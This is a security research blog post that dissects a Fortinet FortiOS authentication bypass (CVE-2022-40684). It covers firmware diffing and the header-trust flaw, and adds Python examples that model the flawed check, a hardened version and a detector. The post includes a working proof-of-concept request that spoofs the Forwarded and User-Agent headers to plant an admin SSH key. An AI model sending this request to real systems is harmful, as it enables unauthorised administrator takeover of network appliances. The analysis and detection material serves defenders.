URL: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/

FORTIOS, FORTIPROXY, AND FORTISWITCHMANAGER AUTHENTICATION BYPASS TECHNICAL DEEP
DIVE (CVE-2022-40684)

by James Horseman | Oct 13, 2022 | Blog, Red Team


INTRODUCTION

Fortinet recently patched a critical authentication bypass vulnerability in
their FortiOS, FortiProxy, and FortiSwitchManager products (CVE-2022-40684).
This vulnerability gives an attacker the ability to log in as an administrator on
the affected system. To demonstrate the vulnerability in this writeup, we will
be using FortiOS version 7.2.1.


POC

Let's examine the inner workings of this vulnerability. You can find our POC
here. The vulnerability is used below to add an SSH key to the admin user,
enabling an attacker to SSH into the affected system as admin.

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: 10.0.40.67
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";
Content-Length: 612

{
  "ssh-public-key1": "\"ssh-rsa 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 dev@devs-MacBook-Pro.local\""
}


DEEP DIVE

FortiOS exposes a management web portal that allows a user to configure the
system. Additionally, a user can SSH into the system, which exposes a locked-down
CLI interface. Our first step after familiarizing ourselves with the system was
to diff the vulnerable firmware with the patched firmware.


FIRMWARE EXAMINATION

We obtained a VMware zip file of the firmware which contained two vmdk files.
First, we examined the vmdk files with virt-filesystems and mounted them with
guestmount:

$>ls *.vmdk
datadrive.vmdk fortios.vmdk
$>sudo virt-filesystems --filesystems -a fortios.vmdk 
/dev/sda1
$>sudo mkdir fortios_mount
$>sudo guestmount -a fortios.vmdk -m /dev/sda1 --ro fortios_mount
$>cd fortios_mount
$>ls
boot.msg datafs.tar.gz extlinux.conf filechecksum flatkc flatkc.chk ldlinux.c32 ldlinux.sys lost+found rootfs.gz rootfs.gz.chk

Next, we extract the root filesystem, where we find a handful of .tar.xz files:

$>sudo cp ../fortios_mount/rootfs.gz .
$>gunzip rootfs.gz 
$>cpio -i 2> /dev/null < rootfs 
$>ls
bin.tar.xz bin.tar.xz.chk boot data data2 dev etc fortidev init lib lib64 migadmin.tar.xz node-scripts.tar.xz proc rootfs sbin sys tmp usr usr.tar.xz usr.tar.xz.chk var

Interestingly, attempting to decompress the xz files fails with corruption
errors:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt

It's unclear if this is an attempt at obfuscation, but we find a version of xz in
the sbin folder of the firmware. We can't run it as is, because its ELF
interpreter path points at a loader that only exists inside the firmware, but we
can patch that path to point at our system's dynamic linker and finally
decompress the files:

$>xz --decompress *.xz
xz: bin.tar.xz: Compressed data is corrupt
xz: migadmin.tar.xz: Compressed data is corrupt
xz: node-scripts.tar.xz: Compressed data is corrupt
xz: usr.tar.xz: Compressed data is corrupt
$>find . -name xz
./sbin/xz
$>./sbin/xz --decompress *.xz
bash: ./sbin/xz: No such file or directory
$>file ./sbin/xz
./sbin/xz: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /fortidev/lib64/ld-linux-x86-64.so.2, BuildID[sha1]=eef5d20a9f8760df951ed122a5faf4de86a7128a, for GNU/Linux 3.2.0, stripped
$>patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 sbin/xz
$>./sbin/xz --decompress *.xz
$>ls *.tar
bin.tar migadmin.tar node-scripts.tar usr.tar

Next, we untar the files and begin examining their contents. We find /bin
contains a large collection of binaries, many of which are symlinks to
/bin/init. The migadmin folder appears to contain the frontend web code for the
administrative interface. The node-scripts folder appears to contain a Node.js
backend for the administrative interface. Lastly, the usr folder contains a
libraries folder and an apache2 configuration folder.
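Why ./sbin/xz fails with "No such file or directory" while the file plainly exists, and what patchelf --set-interpreter actually changes, is easiest to see by reading the ELF program headers directly. The following Python is an added example, not code from this post or from patchelf: it builds a constructed, non-executable ELF64 image carrying the interpreter path that `file` reported above, locates its PT_INTERP segment, reports when the host lacks that loader, and rewrites the path in place. The function names are ours, and the in-place rewrite only handles a replacement path that fits inside the existing segment, which the shorter /lib64/ld-linux-x86-64.so.2 does; real patchelf also handles the case where the segment must grow.

```python
import os
import struct

PT_INTERP = 3
_EHDR = "<16sHHIQQQIHHHHHH"   # ELF64 little-endian file header, 64 bytes
_PHDR = "<IIQQQQQQ"           # ELF64 program header, 56 bytes


def _program_headers(data: bytes):
    """Yield (p_type, p_offset, p_filesz, phdr_offset) for every program header."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    hdr = struct.unpack_from(_EHDR, data, 0)
    e_phoff, e_phentsize, e_phnum = hdr[5], hdr[9], hdr[10]
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type, _flags, p_offset, _va, _pa, p_filesz, *_ = struct.unpack_from(_PHDR, data, off)
        yield p_type, p_offset, p_filesz, off


def elf_interpreter(data: bytes):
    """Return the PT_INTERP path (what `file` prints as 'interpreter'), or None."""
    for p_type, p_offset, p_filesz, _ in _program_headers(data):
        if p_type == PT_INTERP:
            return data[p_offset:p_offset + p_filesz].split(b"\0", 1)[0].decode()
    return None


def missing_interpreter(data: bytes, exists=os.path.exists):
    """Return the interpreter path if the host lacks it. The kernel reports that
    case as ENOENT, which is why the shell says 'No such file or directory'
    about a binary that is right there on disk."""
    interp = elf_interpreter(data)
    return interp if interp and not exists(interp) else None


def set_interpreter(data: bytes, new_path: str) -> bytes:
    """In-place equivalent of `patchelf --set-interpreter` for the case where
    the new path fits in the existing PT_INTERP segment (patchelf also grows
    the segment when needed; that is not modelled here)."""
    encoded = new_path.encode() + b"\0"
    buf = bytearray(data)
    for p_type, p_offset, p_filesz, _ in _program_headers(data):
        if p_type == PT_INTERP:
            if len(encoded) > p_filesz:
                raise ValueError("new interpreter path does not fit; use patchelf")
            buf[p_offset:p_offset + p_filesz] = encoded.ljust(p_filesz, b"\0")
            return bytes(buf)
    raise ValueError("no PT_INTERP segment (statically linked?)")


def build_sample_elf(interp: str) -> bytes:
    """Constructed, non-executable ELF64 image: file header, one PT_INTERP
    program header, and the interpreter string. Enough for the parser above."""
    interp_bytes = interp.encode() + b"\0"
    ehdr_size, phdr_size = 64, 56
    e_ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)   # ELF64, LE, v1, SysV ABI
    ehdr = struct.pack(_EHDR, e_ident, 2, 62, 1, 0, ehdr_size, 0, 0,
                       ehdr_size, phdr_size, 1, 0, 0, 0)      # ET_EXEC, EM_X86_64
    phdr = struct.pack(_PHDR, PT_INTERP, 4, ehdr_size + phdr_size, 0, 0,
                       len(interp_bytes), len(interp_bytes), 1)
    return ehdr + phdr + interp_bytes


# The interpreter path `file` reported for ./sbin/xz, and a typical host loader.
FORTI_INTERP = "/fortidev/lib64/ld-linux-x86-64.so.2"
HOST_INTERP = "/lib64/ld-linux-x86-64.so.2"

if __name__ == "__main__":
    image = build_sample_elf(FORTI_INTERP)
    print("interpreter:", elf_interpreter(image))
    print("missing on this host:", missing_interpreter(image))
    patched = set_interpreter(image, HOST_INTERP)
    print("after patch:", elf_interpreter(patched))
```

Running it against a real binary is a matter of passing `open("sbin/xz", "rb").read()` to `elf_interpreter`; the same PT_INTERP lookup is what `file` and `readelf -l` perform.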


THE PATCH

We apply the same steps to firmware version 7.2.2 to enable diffing of the
filesystems. In the bin folder, we find the large init binary has changed and in
the node-scripts folder we find the index.js file has changed:

index.js diff

This diff shows that the Node.js proxy handler for httpsd now explicitly sets
the forwarded, x-forwarded-vdom, and x-forwarded-cert headers itself. This gives
us a hint as to where to start looking for clues on how to exploit this
vulnerability.


HTTPSD AND APACHE HANDLERS

After some searching, we discover that the init binary we mentioned earlier
contains some strings matching the headers in the NodeJs diff. This init binary
is rather large and appears to have a lot of functionality including Apache
hooks and handlers for various management REST API endpoints. To aid in our
research, we SSH’d into the system and enabled debug output for the httpsd
process:

fortios_7_2_1 # diagnose debug enable 
fortios_7_2_1 # diagnose debug application httpsd -1
Debug messages will be on for 5 minutes.
fortios_7_2_1 # diagnose debug cli 8
Debug messages will be on for 5 minutes.

While investigating the forwarded header, we find an apache access_check_ex hook
that parses the header, extracts the for and by fields, and attaches them to the
Apache request_rec structure. You can see that the for field allows us to set
the client_ip field on the request record’s connection.

forwarded header parsing

Additionally, we see a log message that mentions which handler is used for a
particular request.

[httpsd 12478 - 1665412044     info] fweb_debug_init[412] -- Handler "api_cmdb_v2-handler" assigned to request

After searching for the handler string, we find an array of handlers in the init
binary:

handler array

After investigating some of the handlers, we find that many of them make a call
to a function we named api_check_access:

api_check_access

We were immediately drawn to api_check_access_for_trusted_source which first
checks if the vdom socket option is trusted, but then falls through to a
function we called is_trusted_ip_and_user_agent.

is_trusted_ip_and_user_agent

You can see that this function checks that the client_ip is "127.0.0.1" and that
the User-Agent header matches the second parameter. This function gets called
with two possible parameters: "Node.js" and "Report Runner". The "Node.js" path
seems to perform some additional validation, but using "Report Runner" allows us
to bypass authentication and perform API requests!


WEAPONIZATION

The ability to make unauthenticated requests to the REST API is extremely
powerful. However, we noticed that we could not add or change the password for
the admin user. To get around this, we updated the admin user's SSH keys to allow
us to SSH to the target as admin. See our original announcement.


SUMMARY

To wrap things up, here is an overview of the conditions a request must meet to
exploit this vulnerability:

 1. Using the Forwarded header, an attacker is able to set the client_ip to
    "127.0.0.1".
 2. The "trusted access" authentication check verifies that the client_ip is
    "127.0.0.1" and the User-Agent is "Report Runner", both of which are under
    attacker control.

Any HTTP requests to the management interface of the system that match the
conditions above should be cause for concern. An attacker can use this
vulnerability to do just about anything they want to the vulnerable system. This
includes changing network configurations, adding new users, and initiating
packet captures. Note that this is not the only way to exploit this
vulnerability and there may be other sets of conditions that work. For instance,
a modified version of this exploit uses the User-Agent “Node.js”. This exploit
seems to follow a trend among recently discovered enterprise software
vulnerabilities where HTTP headers are improperly validated or overly trusted.
We have seen this in recent F5 and VMware vulnerabilities.
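To make the trusted-source check and the two detection conditions above concrete, here is an added Python example; it is not Horizon3's POC and not Fortinet code. It parses constructed raw requests, including the PoC PUT from above with the key body left out, models the pre-patch check in which the Forwarded "for" node overwrites client_ip before the loopback and User-Agent comparison, shows an illustrative hardened check that only honours Forwarded from a loopback peer (our assumption about a reasonable fix, not Fortinet's actual patch), and a detector for requests matching the two conditions from the summary. The function names, the Request fields and the peer addresses are assumptions; the real parser lives in the stripped init binary.

```python
import re
from dataclasses import dataclass

# The two User-Agent strings the post reports being passed to the trusted-source
# check, and the loopback address it compares client_ip against.
TRUSTED_USER_AGENTS = ("Node.js", "Report Runner")
LOOPBACK = "127.0.0.1"

# for=/by= pairs of an RFC 7239 Forwarded header, quoted or bare.
_PAIR_RE = re.compile(r'(?i)\b(for|by)\s*=\s*("?)([^;,"]*)\2')


def parse_forwarded(value: str) -> dict:
    """Return {'for': addr, 'by': addr} from a Forwarded header value.
    '[127.0.0.1]:8000' and '127.0.0.1:8000' both reduce to the bare address,
    which is what the post shows landing in client_ip."""
    nodes = {}
    for key, _, node in _PAIR_RE.findall(value):
        node = node.strip()
        bracketed = re.match(r"\[([^\]]+)\](?::\d+)?$", node)
        if bracketed:
            node = bracketed.group(1)
        elif node.count(":") == 1:              # IPv4 with a port suffix
            node = node.split(":", 1)[0]
        nodes.setdefault(key.lower(), node)     # first occurrence wins
    return nodes


@dataclass
class Request:           # hypothetical stand-in for Apache's request_rec
    method: str
    path: str
    headers: dict        # lower-cased header name -> value
    peer_ip: str         # address the TCP connection really came from


def parse_request(raw: str, peer_ip: str) -> Request:
    """Parse the head of a raw HTTP/1.1 request (body ignored)."""
    request_line, *header_lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers, peer_ip)


def client_ip_vulnerable(req: Request) -> str:
    """Pre-patch behaviour described above: the access_check_ex hook lets the
    Forwarded 'for' node overwrite the connection's client_ip."""
    node = parse_forwarded(req.headers.get("forwarded", "")).get("for")
    return node or req.peer_ip


def is_trusted_ip_and_user_agent(client_ip: str, user_agent: str, expected: str) -> bool:
    """Loopback client_ip plus an exact User-Agent match."""
    return client_ip == LOOPBACK and user_agent == expected


def api_check_access_vulnerable(req: Request) -> bool:
    """Trusted-source path: either trusted User-Agent is enough, so a remote
    client that spoofs Forwarded gets in without credentials."""
    client_ip = client_ip_vulnerable(req)
    ua = req.headers.get("user-agent", "")
    return any(is_trusted_ip_and_user_agent(client_ip, ua, a) for a in TRUSTED_USER_AGENTS)


def api_check_access_hardened(req: Request) -> bool:
    """Illustrative hardening (our assumption, not Fortinet's patch): trust the
    proxy-supplied headers only when the TCP peer is the local proxy itself."""
    if req.peer_ip != LOOPBACK:
        return False
    return req.headers.get("user-agent", "") in TRUSTED_USER_AGENTS


def looks_like_cve_2022_40684(req: Request) -> bool:
    """Detection rule from the summary: non-loopback peer, Forwarded 'for'
    claiming 127.0.0.1, and one of the trusted User-Agent strings."""
    claimed = parse_forwarded(req.headers.get("forwarded", "")).get("for")
    ua = req.headers.get("user-agent", "")
    return req.peer_ip != LOOPBACK and claimed == LOOPBACK and ua in TRUSTED_USER_AGENTS


# Constructed sample: the PoC request from above, key body omitted.
POC_REQUEST = (
    "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\r\n"
    "Host: 10.0.40.67\r\n"
    "User-Agent: Report Runner\r\n"
    "Content-Type: application/json\r\n"
    'Forwarded: for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";\r\n'
    "Content-Length: 0\r\n\r\n"
)
# Constructed sample: an ordinary unauthenticated request with no spoofed header.
PLAIN_REQUEST = (
    "GET /api/v2/cmdb/system/admin HTTP/1.1\r\n"
    "Host: 10.0.40.67\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

if __name__ == "__main__":
    for raw in (POC_REQUEST, PLAIN_REQUEST):
        req = parse_request(raw, "10.0.40.5")       # assumed remote attacker address
        print(f"{req.method} {req.path}: vulnerable={api_check_access_vulnerable(req)} "
              f"hardened={api_check_access_hardened(req)} flagged={looks_like_cve_2022_40684(req)}")
```

The detector keys on the real TCP peer, not on the header, which is the same distinction the hardened check relies on: a Forwarded header is only meaningful when it was written by a proxy you control, and the legitimate local proxy traffic the check was built for never arrives from a remote address. Feeding the same function requests reconstructed from web-server access logs gives a first-pass hunt for exploitation attempts, provided the log records the User-Agent and the Forwarded header.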
